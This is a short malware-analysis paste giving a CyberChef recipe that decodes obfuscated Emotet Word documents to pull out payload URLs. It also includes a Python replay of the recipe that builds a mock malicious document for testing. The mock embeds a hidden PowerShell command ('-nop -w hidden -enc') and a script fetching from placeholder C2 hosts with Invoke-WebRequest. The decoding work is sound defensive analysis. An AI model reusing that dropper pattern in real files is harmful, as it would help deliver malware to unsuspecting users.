ExecuteMalware

2021-01-20 Emotet CyberChef Recipe

Jan 20th, 2021
Emotet URL Decoder
==================
1. Open the .doc file using CyberChef
2. Paste in the following CyberChef recipe:

Strings('Single byte',10000,'Alphanumeric + punctuation (A)',false)
Drop_bytes(0,144,false)
Find_/_Replace({'option':'Simple string','string':'sg yw
'},'',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':'ah'},'',true,false,true,false)
From_Base64('A-Za-z0-9+/=',true)
Decode_text('UTF-16LE (1200)')
Split('*','\\n')
Find_/_Replace({'option':'Simple string','string':'\''},'',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':'+'},'',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':'('},'',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':')'},'',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':'`'},'',true,false,true,false)
Split('@','\\n')
Find_/_Replace({'option':'Simple string','string':'ah'},'http',true,false,true,false)
Find_/_Replace({'option':'Simple string','string':'!sg'},'
',true,false,true,false)
Extract_URLs(false)

I used this recipe today to extract all of the payload URLs from about 25 Word documents.
It's highly likely that this will stop working at some point.
At the same time, I've been using the bottom half of this recipe for months now.
You just have to swap out some of the obfuscation characters because they change those regularly.

Thanks to the incredible Didier Stevens @DidierStevens for coming up with the original idea.
https://www.youtube.com/watch?v=pJvQgUk01k4

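The same pipeline replayed in Python, as an added example that is not part of the paste: it walks the recipe's steps (printable-string extraction, 144-byte drop, junk removal, Base64 plus UTF-16LE decode, separator splitting, noise stripping, 'ah' to 'http', URL extraction) over a constructed stand-in document rather than a real sample. Assumptions: the stand-in uses '*', '@' separators and only the 'ah' junk token (the recipe's 'sg yw' token is not modelled); the decode step raises instead of returning garbage when the junk tokens or prefix length no longer fit, which is the breakage the author expects.

```python
import base64
import re

JUNK_TOKENS = ("ah",)           # junk inserted into the base64 blob (recipe also strips 'sg yw')
SEPARATORS = ("*", "@", "!sg")  # tokens the recipe turns into line breaks between URLs
NOISE = "'+()`"                 # PowerShell concatenation/grouping characters the recipe removes
PREFIX_LEN = 144                # bytes dropped before the blob, as in Drop_bytes(0,144)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def extract_urls(doc: bytes, min_len: int = 10000) -> list[str]:
    """Replay the paste's CyberChef steps over raw document bytes (added example)."""
    # Strings(...): longest run of printable ASCII at least min_len bytes long
    runs = re.findall(rb"[ -~]{%d,}" % min_len, doc)
    if not runs:
        raise ValueError(f"no printable run of {min_len}+ bytes; document layout has changed")
    text = max(runs, key=len)[PREFIX_LEN:].decode("ascii")   # Drop_bytes(0,144)
    for junk in JUNK_TOKENS:                                  # Find/Replace junk -> ''
        text = text.replace(junk, "")
    try:                                                      # From_Base64 + Decode_text
        script = base64.b64decode(text, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError("blob did not decode: junk tokens or prefix length are stale") from exc
    for sep in SEPARATORS:                                    # Split('*'), Split('@'), '!sg'
        script = script.replace(sep, "\n")
    script = script.translate({ord(c): None for c in NOISE})  # strip ' + ( ) `
    script = script.replace("ah", "http")                     # placeholder -> scheme
    return URL_RE.findall(script)                             # Extract_URLs


def build_sample_doc() -> bytes:
    """Constructed stand-in for a maldoc (not a real Emotet sample): OLE magic, a 144-byte
    printable prefix, then base64(UTF-16LE(script)) with 'ah' junk every 7 characters."""
    script = (
        "$u = ('ah://c2-one.example/wp-admin/*' + 'ahs://c2-two.example/cgi/*').Split('*');"
        "$v = 'ah://c2-three.example/js/@ahs://c2-four.example/@'.Split('@');"
        "foreach($x in $u + $v) { Invoke-WebRequest $x.Replace('ah', 'http') }"
    )
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    junked = "".join(b64[i:i + 7] + "ah" for i in range(0, len(b64), 7))
    prefix = "powershell -nop -w hidden -enc ".ljust(PREFIX_LEN, "/")  # constructed filler
    return (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 32
            + (prefix + junked).encode("ascii") + b"\x00" * 32)


if __name__ == "__main__":
    for url in extract_urls(build_sample_doc(), min_len=200):
        print(url)
```

Swapping the entries in JUNK_TOKENS, SEPARATORS and NOISE is the Python equivalent of the "swap out some of the obfuscation characters" the author describes.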